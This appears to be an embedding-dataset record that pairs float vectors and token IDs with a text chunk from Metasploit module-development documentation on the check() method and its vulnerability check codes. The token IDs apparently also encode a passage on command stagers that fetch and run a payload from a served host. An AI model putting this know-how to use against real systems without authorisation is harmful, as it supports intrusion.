-0.3000751733779907, 0.18080569803714752, -0.4879346489906311, 0.8692244291305542, -0.038926929235458374, 0.42176640033721924, 0.11498730629682541, -0.07043585926294327, 0.5528324246406555, -0.4152522683143616, -0.4420279562473297, -0.20701909065246582, 0.07460630685091019, -0.3257959485054016, 0.39233288168907166, 0.07234343886375427, -0.008807618170976639, 0.41689860820770264, 1.0752567052841187, -0.06277533620595932, -0.3246018886566162, -0.10184139758348465, 0.49719905853271484, 0.5143430233001709, -0.3893226087093353, -1.5641515254974365, -0.7448776364326477, -0.11277056485414505, -0.4192526042461395, -0.09026296436786652, -0.6019879579544067, -0.2551440894603729, -0.47380760312080383, 0.2608761489391327, 0.6057689189910889, -0.7489694952964783, 0.027680890634655952, 0.48521628975868225, -0.18075236678123474, 0.27968791127204895, -0.8128919005393982, 0.22816911339759827, -0.5235517024993896, -0.21617326140403748, 0.030957015231251717, -0.5266693234443665, -1.0180935859680176, -0.04003128036856651, 0.15904422104358673, 0.5027741193771362, 0.5196137428283691, 0.4819366931915283, 1.0666263103485107, -0.43352508544921875, -0.461665540933609, 1.009502649307251, -0.30878719687461853, -0.07431210577487946, -0.433269202709198, 0.013078483752906322, 1.2837334871292114, -0.17479152977466583, 0.06953202188014984, 0.409141480922699, -0.2388955056667328, -0.7548868060112, 0.8525670170783997, -0.010606071911752224, 0.3840453624725342, -0.1327495574951172, 0.48878729343414307, 0.7029852271080017, 0.3666918873786926, -0.4287906289100647, 0.31582990288734436, 0.34530651569366455, 0.8029823303222656, -0.3853534162044525, 0.30577316880226135, -0.5307255983352661, 0.1485387235879898, -0.012521491385996342, 0.32900258898735046, -0.025441378355026245, -0.6633065342903137, -0.14900116622447968, -0.41053250432014465, 0.4018108546733856, -0.41554826498031616, -0.26284047961235046, 0.2811715006828308, 1.3349789381027222, 0.43256503343582153, 0.6902072429656982, 0.15035447478294373, 0.12145689874887466, -0.11296135932207108, -0.5072700381278992, 0.824131190776825, 0.38562995195388794, 0.5042917132377625, -0.33988460898399353, 0.5210000872612, 0.46400678157806396, -0.18250077962875366, -1.00584876537323, -0.05015436187386513, 0.1738729625940323, 0.34247419238090515, 0.025852080434560776, 0.08812796324491501, 0.20219263434410095, 0.11650817096233368, -0.4189217686653137, 0.2523728311061859, -0.19188256561756134, -0.7629547119140625, -0.5305198431015015, 0.0720573365688324, -0.4013880789279938, -0.455641508102417, 0.11739610880613327, -0.6402553915977478, 0.5062749981880188, 0.3607078194618225, -0.10364996641874313, 0.12738442420959473, 0.9944785833358765, 0.6491560935974121, -1.0887315273284912, -0.4460347592830658, 0.2907199263572693, 0.6034616827964783, -0.5867713093757629, -0.03080729767680168, 0.16068238019943237, 0.3800622820854187, -0.25639307498931885, 0.7633885741233826, 0.88726806640625, 0.4600750803947449, -0.095847949385643, -0.28859686851501465, -0.1458161473274231, 0.28103333711624146, 0.01702957972884178, 0.47408628463745117, -0.27782005071640015, 0.2366703748703003, -0.34833410382270813, 0.48635798692703247, 0.2922026515007019, 0.40163299441337585, 0.5780642628669739, 0.2679297924041748, 0.1431114375591278, 0.18393109738826752, 0.2550945281982422, 0.24169659614562988, -0.4321964681148529, 0.5749248266220093, 0.42934510111808777, -0.27732446789741516, -0.2762419283390045, -0.5195997357368469, 0.24581700563430786, 0.1450585275888443, -0.7213853597640991, 1.0337237119674683, -0.3358268141746521, 0.14850755035877228, -0.4381912648677826, -0.35718175768852234, -0.11425827443599701, 0.07292361557483673, -0.4903714060783386, -0.5020907521247864, 0.030408086255192757, 0.9270244836807251, -0.5113906860351562, 0.4532151222229004, -0.1459144651889801, 0.24429896473884583, 0.15745966136455536, 0.22563967108726501, 0.47681373357772827, -0.869488000869751, -0.23812642693519592, -0.19338223338127136, -0.8227580189704895, 0.064662866294384, -0.44068312644958496, 0.18247249722480774, -0.042563170194625854, -0.3202560544013977, -0.14937934279441833, -0.3529745638370514, 0.6952265501022339, 0.10073312371969223, 0.5123481750488281, 0.1940041035413742, 0.4204885959625244, 0.01642305590212345, -0.3414263427257538, 0.21622903645038605, -0.19651305675506592, 0.5967280268669128, -0.262724369764328, -0.18516843020915985, 0.1526503562927246, -0.3174080550670624, -0.1404806673526764, -0.7072948813438416, -0.4004283845424652, 0.4253954589366913, 0.5086755156517029, -0.06150871142745018, -0.4991717040538788, -0.5001153945922852, 0.6294502019882202, 0.5559207797050476, -0.38270053267478943, 0.5263932347297668, 0.292734295129776, -0.6042783856391907, 0.8179364204406738, 0.8517666459083557, -0.29320114850997925, 0.5765097141265869, -0.016675174236297607, 0.27199092507362366, -0.4004305899143219, 1.3822187185287476, 0.6331771016120911, -0.19020302593708038, -1.2345877885818481, -0.675451397895813, 0.17646831274032593, -1.0042091608047485, -0.03019040636718273, -0.5192604064941406, -0.649912416934967, 1.0965495109558105, -0.6918317079544067, -0.5840771198272705, 0.3385883569717407, -0.33810025453567505, 0.2809670865535736, -0.40603208541870117, -0.7107259631156921, -0.0934702679514885, 0.2401689887046814, 0.6973176002502441, -0.1655001938343048, -0.02246321551501751, -0.0036211698316037655, 0.3782179653644562, 0.2126651555299759, -0.5538915991783142, 0.36089056730270386, 0.2336587756872177, -0.12908998131752014, 0.29920873045921326, 0.42748183012008667, -1.075228214263916, -0.20428632199764252, -0.9630588293075562, -0.04610881581902504, -0.2781362533569336, -0.12368748337030411, 0.508299708366394, 0.6960377097129822, 0.4019986391067505, -1.2350326776504517, 0.04297081381082535, -0.051672957837581635, 0.6046478748321533, 0.22376905381679535, -0.07047504186630249, 0.060528263449668884, -0.35726404190063477, -0.11908537149429321, -0.8349996209144592, 0.07365088909864426, 0.7389560341835022, 1.1627439260482788, -0.7059443593025208, 0.5726031064987183, 0.4534505307674408, 0.08658086508512497, -0.04509451985359192, -0.6046962738037109, 0.25749850273132324, 1.167610764503479, 0.476468950510025, 0.0025621834211051464, -0.3172082006931305, 0.07577145844697952, -0.2271236926317215, 0.33025383949279785, 0.538935661315918, -0.5915740728378296, -0.12674172222614288, -0.14739133417606354, 0.17093080282211304, 0.07901964336633682, -0.4895758628845215, 0.3937942683696747, -0.15103201568126678, 0.7345218658447266, -0.307729035615921, -0.4336143434047699, -0.8649775981903076, -0.08067744970321655, 0.5102854371070862, 0.919008195400238, 0.5673174262046814, 0.2930721640586853, 0.4945298135280609, 0.7618196606636047, 0.07723410427570343, 0.3243006765842438, -0.4862522780895233, -0.02469867467880249, 0.573525607585907, 0.15343022346496582, 0.6634961366653442, 0.3528280556201935, 0.11575503647327423, -0.2206229716539383, 0.9469060301780701, 0.14155776798725128, 0.006413166411221027, -0.7568956017494202, 0.39591744542121887, -0.2501736879348755, 0.04774739220738411, 0.22163191437721252, -1.1456947326660156, -0.8461452126502991, 1.2344465255737305, 0.9290538430213928, -0.3893664479255676, -0.672362208366394, -0.3966566324234009, 0.2637990713119507, 0.1978752315044403, -0.31434017419815063, -0.4382031559944153, -0.15966136753559113, -0.4234800636768341, -1.1903380155563354, 1.3032994270324707, 0.5936440229415894, 0.34727269411087036, -0.795281708240509, -0.6872060894966125, -0.06180638447403908, -0.28319621086120605, -0.2901460528373718, 0.34395602345466614, -0.35817408561706543, 0.20956449210643768, 0.5698637962341309, -0.4806722104549408, -0.922306478023529, -0.1485491842031479, -0.20228397846221924, -0.4001361131668091, 0.2812982201576233, -0.06382691115140915, -0.21951419115066528, 0.0008235604618676007, -0.21096250414848328, 0.27085205912590027, 0.1680712252855301, 0.4892130494117737, -0.25820860266685486, 0.5601081848144531, 0.5288252830505371, -0.36439746618270874, -0.3350553810596466, 0.572855532169342, 0.17262008786201477, 0.06568855792284012, 0.7756744027137756, 0.1167852133512497, 0.015335301868617535, 1.2633262872695923, 0.5221433043479919, -0.3543414771556854, -0.5328579545021057, -0.31422868371009827, 0.2737645208835602, 0.004493200685828924, 0.3187456429004669, -0.13375739753246307, -0.6852207779884338, 1.0603868961334229, 0.04126793146133423, -0.20609697699546814, 0.10058002173900604, -0.8597651720046997, 0.044778358191251755, 0.2885292172431946, -0.08561845868825912, -0.5903415679931641, -0.6689487099647522, 0.06097381189465523, 0.1354610174894333, -0.5728416442871094, -0.371730238199234, 0.0027489671483635902, 0.1544259488582611, -0.035032544285058975, 0.5153342485427856, 0.14196360111236572, 0.390607625246048, -0.7394149899482727, -0.05115043371915817, 0.14588768780231476, -0.2956068813800812, 0.026209251955151558, -0.1867266148328781, 0.06983307749032974, 0.5008759498596191, 0.10776707530021667, -0.44283944368362427, 0.20012341439723969, -0.341073215007782, 0.09125643968582153, -0.0388418547809124, 0.4844244718551636, -0.21189948916435242, -0.4610822796821594, -0.2798950970172882, 0.33179083466529846, -0.20101502537727356, -0.7353053689002991, -0.2550792396068573, 0.45362141728401184, -0.15594933927059174, 0.6407472491264343, 0.7309157252311707, -0.1329389214515686, -1.0329136848449707, -0.31563669443130493, 0.03697236254811287, -0.5180230736732483, -0.11637841165065765, -0.7020101547241211, -0.9558075070381165, -0.6803614497184753, 0.4248611032962799, 0.25651922821998596, -0.7259589433670044, 0.0007762834429740906, -0.2244003862142563, -0.051909077912569046, -0.6172980666160583, 0.1888924092054367, 0.1241617202758789, -0.2055908441543579, 0.23270973563194275, 0.5612269043922424, -0.07470442354679108, 0.2995970547199249, -0.45025455951690674, 0.4080161452293396, 0.6002410650253296, 0.11285129189491272, -1.0670353174209595, -0.18914422392845154, 0.13148917257785797, 0.25997912883758545, -0.08946409821510315, -0.1606559008359909, -0.6499817967414856, -0.07718439400196075, -0.41481900215148926, 0.033696677535772324, -0.23898197710514069, -0.09831655025482178, -0.6748644113540649, 0.5420984029769897, 0.25473764538764954, 0.06794864684343338, 0.743320107460022, -0.17218483984470367, 0.4943491816520691, -0.1618754118680954, 0.15148641169071198, -0.656245231628418, 0.21101070940494537, -0.3923586308956146, -0.3404202163219452, 0.4607491195201874, -0.0022007033694535494, -0.319491982460022, 0.40051722526550293, -0.5460209846496582, 0.8026591539382935, -0.7851526141166687, 0.5071101784706116, 0.9256337285041809, -0.21201442182064056, 0.009818525984883308, -1.6933213472366333, 0.665919840335846, 0.7187523245811462, -0.5616414546966553, -0.15193761885166168, 0.14549165964126587, -0.44152674078941345, -0.26340746879577637, -0.3032934367656708, 0.19181294739246368, -0.16286496818065643, -0.005214369855821133, 0.45568469166755676, -0.35758176445961, 0.5365633964538574, -0.332490473985672, -0.995949923992157, -0.3403943181037903, 0.34425532817840576, 0.3569871485233307, 0.3293165862560272, -0.021688513457775116, 0.8311004638671875, 0.9029487371444702, 0.5782918930053711, -0.5591880083084106, 0.10661821067333221, -0.5543104410171509, 0.2931500971317291, -0.22114327549934387, -0.34063729643821716, 1.149787425994873, -0.2609938979148865, -0.91783207654953, -1.21717369556427, -0.5183665752410889, -0.0300785880535841, -0.4634241461753845, 0.29037559032440186, -0.6734868288040161, -0.3952089548110962, 0.038376335054636, 0.027112865820527077, -0.009995531290769577, 0.2090831696987152, -0.0820823460817337, -0.6219249367713928, 0.008065532892942429, -0.20548607409000397, 0.4945928454399109, 0.6845769286155701, 0.00983524415642023, -0.727227509021759, -0.9378361105918884, -0.024559618905186653, -0.6840619444847107, 1.0263727903366089, 0.27453532814979553, 0.6302794814109802, 0.6388149261474609, 0.2621685862541199, 0.10545028746128082, 0.9082320332527161, -0.05682391673326492, 0.5778923630714417, -0.21407629549503326, -0.4590424597263336, -0.9245989322662354, -0.22487306594848633, 0.6052854657173157, 0.24365325272083282, 0.03393721953034401, -0.2923136353492737, 0.26097777485847473, 0.024501295760273933, 0.06318309158086777, -0.1838187575340271, -1.1066237688064575, 0.2700132727622986, -0.935083270072937, -0.06087155640125275, -0.04940419644117355, -0.0901339203119278, 0.5105149149894714, -0.6243619918823242, -0.19931742548942566, -0.284816175699234, -0.6755005121231079, 0.3248685598373413, 0.2409122884273529, -0.44211792945861816, -0.21713337302207947, 0.45404061675071716, -0.6793971061706543, -0.5275248885154724, -0.4656331241130829, 0.2830721437931061, -0.36937689781188965, -0.6149192452430725, 0.29628562927246094, -0.8057774901390076, -0.5220958590507507, 0.2620183229446411, 0.3580637574195862, -0.002951411996036768, 0.09259313344955444, -0.5173802971839905, -0.11746631562709808, 0.2363480180501938, -0.4989156126976013, 1.5652151107788086, 0.5269970893859863, -0.6223713159561157, 0.8883143067359924, 0.6805381178855896, -0.11963234096765518, -0.4590456783771515, 0.40642213821411133, 0.5604940056800842, 0.05557215213775635, -0.6532819867134094, -0.19635708630084991, 0.2875957489013672, -0.32763877511024475, 0.8162776827812195, -0.24917185306549072, 0.26821672916412354, 0.008617930114269257, 1.0256227254867554, -0.1681467741727829, 0.22854028642177582, 0.2440398782491684, 0.8339702486991882, -0.054734744131565094, 0.14320255815982819, 0.1372351497411728, -0.34495577216148376, -0.6336922645568848, -0.23211093246936798, -0.14030712842941284, -0.1770632266998291, 0.3390209972858429, 0.612318217754364, 0.29255902767181396, 0.20087388157844543, -0.8430348634719849, 0.10807961225509644, -0.4706963300704956, -0.1484021693468094, -0.08684267103672028, 1.176480770111084, -0.11467347294092178, 0.0351705402135849, 0.1142030656337738, -0.27345171570777893, 0.0356144905090332, 0.14694057404994965, -0.8556342124938965, -0.4926019608974457, 0.1212843805551529, -0.45653438568115234, -0.041821692138910294, -0.44976291060447693, 0.025536350905895233, -0.385893315076828, 0.36532121896743774, -0.0841943621635437, 0.5748315453529358, 0.32010897994041443, 0.06163753941655159, 0.6931155920028687, -0.9009878635406494, -0.299681156873703, 0.43839558959007263, 0.05701785907149315, -0.33150893449783325, -1.1192971467971802, 0.08823639899492264, 1.3089450597763062, 0.07798886299133301, 0.21344275772571564, -0.24844032526016235, -0.17195315659046173, -0.28992968797683716, 0.4334222972393036, -0.4041935205459595, 0.006071662064641714, 0.001022035488858819, 0.6600245237350464, -0.96982741355896, -0.25376835465431213, -0.8183327317237854, -0.05216417834162712, 0.06870371103286743, 0.07925832271575928, 0.30506399273872375, 0.36207571625709534, 0.003986514173448086, -0.6602550148963928, 0.5051349401473999, 0.8143196105957031, 0.22832772135734558, -0.08147197216749191, -0.07954686135053635, -0.4569639563560486, 0.0338246114552021, 0.8843747973442078, 0.08057285845279694, -0.10900460928678513, 0.1440725475549698, 0.049037810415029526, -0.2567310929298401, -0.6774612069129944, 0.4064111113548279, -0.071625255048275, -0.873528778553009, 0.46975433826446533, -0.7474288940429688, -0.546443521976471, 0.13083870708942413, 0.1547858864068985, 0.2477002888917923, -0.47309714555740356, -0.3625999987125397, -0.20501123368740082, 0.001663351897150278, 0.5673072338104248, -0.4044099748134613, -0.2741415798664093, 0.6238746643066406, -0.41096803545951843, 0.5740146040916443, 0.48110654950141907, 0.21804004907608032, 0.39635908603668213, 0.46718713641166687, 0.7445076107978821, 0.01600411720573902, 0.3699887692928314, -0.07236234098672867, 0.7038173079490662, -0.22053207457065582, 0.144534170627594, -0.0887015163898468, 0.19852270185947418, -0.37252819538116455, 0.5332186818122864, -0.2721293568611145, 0.4238872528076172, -0.05472312495112419, -0.0761580839753151, 0.40342840552330017, -0.17441706359386444, -0.42979177832603455, -0.7963463664054871, -0.4196631908416748, -0.6282369494438171, -0.160457581281662, 0.20916004478931427, 0.24664542078971863, -0.6135773658752441, 0.4510916471481323, 0.3115643858909607, 0.21434292197227478, -0.44750484824180603, 0.7626678347587585, -0.3389175832271576, 1.0214719772338867, -0.1794237196445465, -0.48159027099609375, -0.6037793755531311, 0.39337158203125, -0.19631066918373108, 0.07332278788089752, -0.1608475148677826, 0.26700615882873535, -0.16007375717163086, -0.7389864325523376, 0.201012521982193, 0.04203987494111061, 0.21090082824230194, -0.3410339057445526, -0.7468534708023071, 0.6163627505302429, 0.11868679523468018, -0.2513883709907532, -0.1364092230796814, 0.7196425199508667, -0.04472418874502182, -0.33058083057403564, -0.2910238206386566, -0.08611483126878738, -0.6967061758041382, -0.3230246603488922, -0.4894774258136749, 0.21597149968147278, -0.1703786700963974, 0.06869785487651825, -0.44337913393974304, 0.12874379754066467, -0.14949095249176025, 0.2568829357624054, -0.017686903476715088, 0.5110782384872437, 0.3254213333129883, 0.4352560341358185, 0.7939614653587341, -0.0011830200674012303, -0.2707846462726593, 0.22277681529521942, -0.12493930757045746, 0.6768473982810974, 0.4812053143978119, 0.6718145608901978, 0.2469775527715683, 0.1314874142408371, -0.1347847580909729, 0.2733123004436493, -0.05370836704969406, -0.208950012922287, -0.40530186891555786, -0.6973902583122253, 0.27160754799842834, -1.1855132579803467, -0.20922361314296722, -0.33359771966934204, 0.7047227025032043, 0.14176636934280396, 0.1569598764181137, -0.09177383780479431, 0.30696171522140503, -0.7399014234542847, -0.9176640510559082, -0.43753373622894287, -0.5561217665672302, -0.723682701587677, -0.4500853419303894, -0.33565419912338257, -0.5313393473625183, 4.3752264976501465, 0.24359886348247528, 0.7642162442207336, 0.29590854048728943, 0.2708628177642822, 0.5890952348709106, 0.2020517736673355, -0.4305167496204376, 0.1999116986989975, -0.8058832287788391, 0.2010738104581833, -0.4336659610271454, 0.0529128834605217, 0.7354201674461365, -0.3752666413784027, 0.7728679776191711, -0.3334008455276489, 0.038699910044670105, 0.6215843558311462, -0.7003147006034851, -0.0019776197150349617, -0.1688936948776245, -0.29850491881370544, 0.7360984086990356, -0.10588506609201431, 0.8833814263343811, 0.3815714418888092, -0.11186537146568298, 1.0142648220062256, -0.8464859127998352, -0.33463814854621887, -0.14423754811286926, 0.9631127715110779, 0.15097375214099884, -0.35380470752716064, 0.6125142574310303, -0.37626412510871887, -0.3220084309577942, 0.3317633271217346, -0.2398909479379654, 0.2800058424472809, 0.5721397399902344, -0.13702315092086792, -0.609696626663208, -0.4462597370147705, 0.2850516736507416, -0.3362300992012024, 0.3147714138031006, 1.2470601797103882, -0.48539793491363525, 0.4830132722854614, -0.26187664270401, 0.03269699588418007, -0.4808777868747711, -1.675018072128296, -0.23432636260986328, 0.5453053116798401, 0.21172328293323517, -0.23464302718639374, -0.08787281811237335, 0.526140570640564, 0.39125221967697144, 0.16319100558757782, 0.22420698404312134, -0.4857473373413086, 0.22153417766094208, 0.19865073263645172, 0.33031997084617615, -0.294422447681427, -1.0009266138076782, 0.03930579498410225, -0.5630204677581787, -0.288491427898407, -0.571291983127594, 0.40606433153152466, 0.30710557103157043, 0.2947536110877991, 0.06715790927410126, 0.03082629106938839, -0.4923102855682373, -0.41307756304740906, -0.3709735572338104, -0.6627761721611023, -0.10375665128231049, 0.48075881600379944, 0.2676528990268707, -0.805904746055603, -0.581366777420044, -0.6442290544509888, 0.11395947635173798, 0.7961370944976807, 0.7627169489860535, -0.5739597678184509, 0.37237778306007385, 0.328468918800354 ]
[ 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 1059, 18150, 1005, 1033, 2030, 2275, 1996, 1024, 1059, 18150, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 1059, 18150, 1007, 1048, 2860, 2361, 5227, 3094, 2754, 2099, 1011, 4800, 4132, 10760, 1048, 2860, 2361, 1011, 5227, 3094, 2754, 2099, 2003, 2714, 2000, 1996, 15390, 3094, 2754, 2099, 1010, 3272, 2612, 1997, 2478, 15390, 2000, 8816, 1996, 5371, 2006, 1996, 4539, 3677, 1010, 2009, 3594, 1996, 1048, 2860, 2361, 1011, 5227, 3094, 1012, 2009, 5942, 5198, 2000, 20648, 1037, 5034, 2615, 15006, 2102, 1998, 5034, 2615, 6442, 5300, 1998, 2097, 2707, 2019, 8299, 8241, 2000, 3677, 1996, 18093, 5371, 1012, 2019, 2742, 1997, 2008, 3504, 2714, 2000, 2023, 1024, 1048, 2860, 2361, 1011, 5227, 1011, 1049, 2131, 24471, 2140, 1024, 1013, 1013, 2184, 1012, 1019, 1012, 11502, 1012, 16345, 1024, 3770, 17914, 1013, 9108, 2243, 26291, 19797, 18195, 8525, 1028, 1013, 1056, 8737, 1013, 7929, 15422, 2100, 7962, 1025, 10381, 5302, 2094, 1009, 1060, 1013, 1056, 8737, 1013, 7929, 15422, 2100, 7962, 1025, 1013, 1056, 8737, 1013, 7929, 15422, 2100, 7962, 1025, 28549, 1011, 1042, 1013, 1056, 8737, 1013, 7929, 15422, 2100, 7962, 2000, 2224, 1996, 1048, 2860, 28139, 15500, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 1048, 2860, 28139, 15500, 1005, 1033, 2030, 2275, 1996, 1024, 1048, 2860, 28139, 15500, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 1048, 2860, 28139, 15500, 1007, 18584, 3094, 2754, 2099, 1011, 18667, 2094, 2069, 10760, 18584, 3094, 2754, 2099, 2003, 2714, 2000, 1996, 15390, 3094, 2754, 2099, 1010, 3272, 2612, 1997, 2478, 15390, 2000, 8816, 1996, 5371, 2006, 1996, 4539, 3677, 1010, 2009, 3594, 1996, 18584, 3094, 1012, 2009, 5942, 5198, 2000, 20648, 1037, 5034, 2615, 15006, 2102, 1998, 5034, 2615, 6442, 5300, 1998, 2097, 2707, 2019, 8299, 8241, 2000, 3677, 1996, 18093, 5371, 1012, 2019, 2742, 1997, 2008, 3504, 2714, 2000, 2023, 1024, 18584, 1011, 1053, 2080, 1013, 1056, 8737, 1013, 1057, 2290, 16050, 9397, 5666, 24471, 2140, 1024, 1013, 1013, 2184, 1012, 1019, 1012, 11502, 1012, 16345, 1024, 3770, 17914, 1013, 9108, 2243, 26291, 19797, 18195, 8525, 1025, 10381, 5302, 2094, 1009, 1060, 1013, 1056, 8737, 1013, 1057, 2290, 16050, 9397, 5666, 1025, 1013, 1056, 8737, 1013, 1057, 2290, 16050, 9397, 5666, 1025, 28549, 1011, 1042, 1013, 1056, 8737, 1013, 1057, 2290, 16050, 9397, 5666, 2000, 2224, 1996, 18584, 2754, 2099, 1010, 2593, 20648, 2115, 4642, 5104, 26702, 12881, 14973, 2953, 1999, 1996, 27425, 1024, 1005, 4642, 5104, 26702, 12881, 14973, 2953, 1005, 1027, 1028, 1031, 1005, 18584, 1005, 1033, 2030, 2275, 1996, 1024, 18584, 3145, 2000, 15389, 1035, 4642, 5104, 26702, 2099, 1024, 15389, 1035, 4642, 5104, 26702, 2099, 1006, 14894, 1024, 1024, 18584, 1007, 102 ]
metasploit
107.txt
12
[CLS] in metasploit, exploits and auxiliary modules support the check command that allows the user to be able to determine the vulnerable state before using the module. this feature is handy for those who need to verify the vulnerability without actually popping a shell, and used to quickly identify all vulnerable, or possibly exploitable machines on the network. although vulnerability checks aren ’ t the focus of metasploit, because it isn ’ t a vulnerability scanner like nexpose, we do actually encourage people to implement the check ( ) method anyway to add more value to the module. if you do write one, make sure to keep these guidelines in mind : check method outputmodules messages are important to the user, because they keep the user informed about what the module is doing, and usually make the module more debuggable. however, you do also want to keep your messages in verbose mode because it becomes really noisy if the check is used against multiple targets. ideally, you only should be using these print methods : methoddescriptionvprint _ line ( ) verbose version of print _ linevprint _ status ( ) verbose version of print _ status that begins with β€œ [ * ] ” vprint _ error ( ) verbose version of print _ error that begins with β€œ [ x ] ” vprint _ warning ( ) verbose version of print _ warning that begins with β€œ [! ] ”, in yellowbetter yet, use the checkcode description to provide additional information ( see below ). note : you shouldn ’ t be printing if a target is vulnerable or not, as this is automatically handled by the framework when your method returns a check code. check codesonce you have determined the vulnerable state, you should return a check code. check codes are constants defined in msf : : exploit : : checkcode, and these are the ones you can use : checkcodedescriptionexploit : : checkcode : : unknownused if the module fails to retrieve enough information from the target machine, such as due to a timeout. exploit : : checkcode : : safeused if the check fails to trigger the vulnerability, or even detect the service. exploit : : checkcode : : detectedthe target is running the service in question, but the check fails to determine whether the target is vulnerable or not. exploit : : checkcode : : appearsthis is used if the vulnerability is determined based on passive reconnaissance. for example : version, banner grabbing, or simply having the resource
[ 0.38242992758750916, -0.6358959078788757, -0.021111855283379555, 0.39210373163223267, -0.8373504877090454, -0.3253272473812103, 0.19065429270267487, 0.37354156374931335, 0.20918500423431396, 0.7796851992607117, 0.49846604466438293, -0.22517292201519012, 0.26325368881225586, -0.49824512004852295, -0.8055433630943298, -0.5301399827003479, -0.495513916015625, -0.4742615818977356, -1.0842078924179077, 0.19279740750789642, 0.5503944754600525, -0.402537077665329, -0.849860668182373, -0.16147278249263763, -1.1688958406448364, 0.499506413936615, 0.8329331278800964, -0.2277483195066452, 0.8999718427658081, 0.928046703338623, -0.055093247443437576, 0.13441859185695648, -0.09464715421199799, -0.3362303376197815, 0.2662631571292877, -0.6938655972480774, 0.7022727131843567, -0.6090134978294373, -0.2932649254798889, -0.3130103349685669, 0.3590139150619507, 0.3831508457660675, 0.7090632319450378, -1.243567943572998, -1.319949746131897, 0.12416302412748337, 0.07589112967252731, -0.28592434525489807, 0.5840440988540649, -1.0064538717269897, 0.35281136631965637, 0.7398200035095215, 0.1862468421459198, 0.28095775842666626, -0.04885412007570267, -0.07276646047830582, 0.11244439333677292, -0.01280478946864605, -0.5513631701469421, 0.28509050607681274, 0.10508710891008377, 0.2271931767463684, 0.19841793179512024, -0.8172172904014587, 0.7076827883720398, 0.32169654965400696, -0.1286994069814682, -0.13414925336837769, -0.008429809473454952, -0.6479595303535461, -0.19351458549499512, 0.1466963142156601, -0.4554106593132019, -0.834560215473175, -0.3425105810165405, 0.2815563678741455, 0.42846018075942993, -0.05534232407808304, -0.9976854920387268, 0.7406195402145386, -0.20964959263801575, 0.848771333694458, -0.09271317720413208, -0.5258082747459412, 0.11254052817821503, -0.7834944128990173, 0.27114441990852356, 0.14566688239574432, -0.5268104076385498, 0.27529680728912354, 0.44554731249809265, 0.7370396256446838, -0.18496617674827576, -0.12188582867383957, 0.9900457262992859, 0.8079404234886169, -0.39727115631103516, 0.1948423683643341, 0.8197192549705505, -0.009330106899142265, 0.8658197522163391, 0.4043622612953186, 0.20782993733882904, 0.3720567524433136, 0.26884815096855164, 0.23850153386592865, 0.26643142104148865, 0.2842673361301422, -0.2308957725763321, -0.22858871519565582, 0.039342910051345825, 0.0563819482922554, -0.5637733340263367, -0.8716020584106445, -1.0128825902938843, 0.613772451877594, 0.3242209553718567, -0.23061822354793549, -0.5602126121520996, 0.42172935605049133, 0.23153901100158691, -0.18083447217941284, -0.2858196496963501, -0.37477898597717285, 0.44618546962738037, 0.4157979190349579, 0.5091529488563538, 1.0879037380218506, -0.18772409856319427, -0.34507614374160767, -0.5541365742683411, 0.1742810308933258, 0.42375749349594116, 0.6533199548721313, -0.6217254400253296, 0.39181599020957947, 0.06245483085513115, -0.23659247159957886, 0.6611047983169556, -1.4453389644622803, 0.4074449837207794, 0.5814139246940613, 0.5677401423454285, 1.1589186191558838, 0.2764771580696106, -0.6699255704879761, 0.07992592453956604, -0.23953455686569214, -0.2530800700187683, 0.8016867637634277, -0.2672892212867737, 0.04239414259791374, 0.06776463985443115, -0.05798754468560219, -0.17038065195083618, 0.21822640299797058, -0.764758825302124, 0.35442301630973816, -0.2167799025774002, -0.10877303779125214, -0.3707323372364044, 1.2912710905075073, 0.4481147825717926, 0.20067283511161804, -0.3538377583026886, 0.35176998376846313, -0.7073904871940613, -0.44478458166122437, 0.020182937383651733, -0.19641096889972687, 0.10376559942960739, -0.055631138384342194, 0.007088103797286749, 0.5619243383407593, 1.8939495086669922, 0.7584448456764221, 0.02076130360364914, -0.43536508083343506, 0.1187286227941513, 0.35147035121917725, -0.3398469388484955, 0.6355971097946167, 0.3150687515735626, 0.7660320997238159, 0.054449256509542465, 0.8450378775596619, -0.5025492906570435, -0.8874080181121826, 0.5414869785308838, 0.14685919880867004, -0.2164991796016693, 0.2620311379432678, -0.4999062716960907, -0.025701269507408142, 0.3040561079978943, -0.33869707584381104, -0.7276284098625183, 0.007847701199352741, 0.3382001519203186, -1.6926984786987305, -0.7004267573356628, 0.4004422128200531, 0.1405416876077652, 0.48568084836006165, -0.33070313930511475, -0.7860194444656372, 0.2648927569389343, 0.5826677083969116, -0.301428884267807, 0.4062897264957428, 0.41329702734947205, -0.3072972595691681, -0.9423034191131592, 0.43003717064857483, -0.17617858946323395, 0.32706838846206665, -0.6988946795463562, 0.11540959030389786, -0.04421564191579819, 0.4065153896808624, -0.23515374958515167, 0.7849530577659607, 0.4554882347583771, 0.07536309957504272, -0.5188269019126892, 0.11853919178247452, 0.01225925050675869, 0.06194779649376869, -0.07115131616592407, -0.1206757128238678, -0.33013638854026794, 0.747822105884552, 0.24121403694152832, 0.897966742515564, 0.3529139757156372, 0.048799071460962296, 0.5742812156677246, 0.3169548511505127, 0.7373723983764648, -0.1328030824661255, -0.3890479803085327, 0.5127940773963928, -0.08792780339717865, 0.6578790545463562, 0.3287244141101837, -0.29490482807159424, 0.3476420044898987, -0.35563039779663086, 0.48523128032684326, 0.5828197002410889, -0.7024633884429932, 1.1178611516952515, 0.3565067946910858, -0.06679320335388184, -0.6565870642662048, -0.8747830986976624, 0.2689302861690521, 1.0128799676895142, -1.2774602174758911, -0.4512864649295807, 0.5896216034889221, -0.13322673738002777, -0.22712905704975128, -0.4794120788574219, 0.47164592146873474, 0.61467045545578, -0.33354201912879944, 0.5996425151824951, -0.5453356504440308, -0.7200075387954712, -0.49758508801460266, -0.24404455721378326, -0.9266440272331238, -0.35420432686805725, -0.682442843914032, 0.8762550950050354, -0.14690211415290833, -0.5119736194610596, -0.07128109037876129, -0.939284086227417, -0.7204562425613403, -0.35915300250053406, 0.37539204955101013, 0.4932534098625183, 0.5505096912384033, -0.2580801546573639, -0.4214284121990204, 